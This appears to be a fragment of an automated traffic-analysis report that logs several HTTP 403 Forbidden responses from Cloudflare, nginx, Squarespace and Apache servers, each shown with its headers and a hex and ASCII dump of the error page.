                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:31 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D1LfqOT1xLzr6Q3ZvxIjZM6%2FO2kd1uxq%2Fo7Tw1oe2c8Yh3jwDF7Kz9gRl3K2NlCA55oADygLjPsVe5JE%2BlEvzpg86Reo54goL8rCFqcDeEse9y0x29ou6BRRUynI5aNQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76f4b2d1718f5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:31 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:31 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,m0j2EEknGIVUW/liY8BLLqv1Icz/+auWkycB0m9nz7sFJmEKNgQ96+wiTVoMq713X-Wix-Request-Id: 1690487671.65464337601319641X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:31 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,m0j2EEknGIVUW/liY8BLLrjAMl1QewRKjWjp2YfgqGDDa2gaReObvoMyILa0JRsyX-Wix-Request-Id: 1690487671.702463822581124293X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:54:31 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:32 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BU2rDhLmQBOcZDliMzY3OGU2NGFkNjk2ZGIzNTlmMzJkYTczNzRj;Path=/X-Contextid: i1cUiT9S/PsTSEeBqData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:54:47 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RgHuqVum2GWgtwrT3AVuxns4DQsGWH6ywJ8fsrX%2B%2BpAuF6uuaDc%2Fz8DzeBBa%2FmByAvts69ygxQg87eTqzGvas3Z8CIzqOuwo6ViQPlgZya6CMCfguqSEbXNkuPWE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76f512deb1cc5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:32 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BVJsjEt//Q+aOTIwMDBkNTlmOTE5YWU1YmRiMjU1MmMyYjA0NjQ3;Path=/X-Contextid: 2nvKw4UY/YA28v7ylData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 27 Jul 2023 19:54:32 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
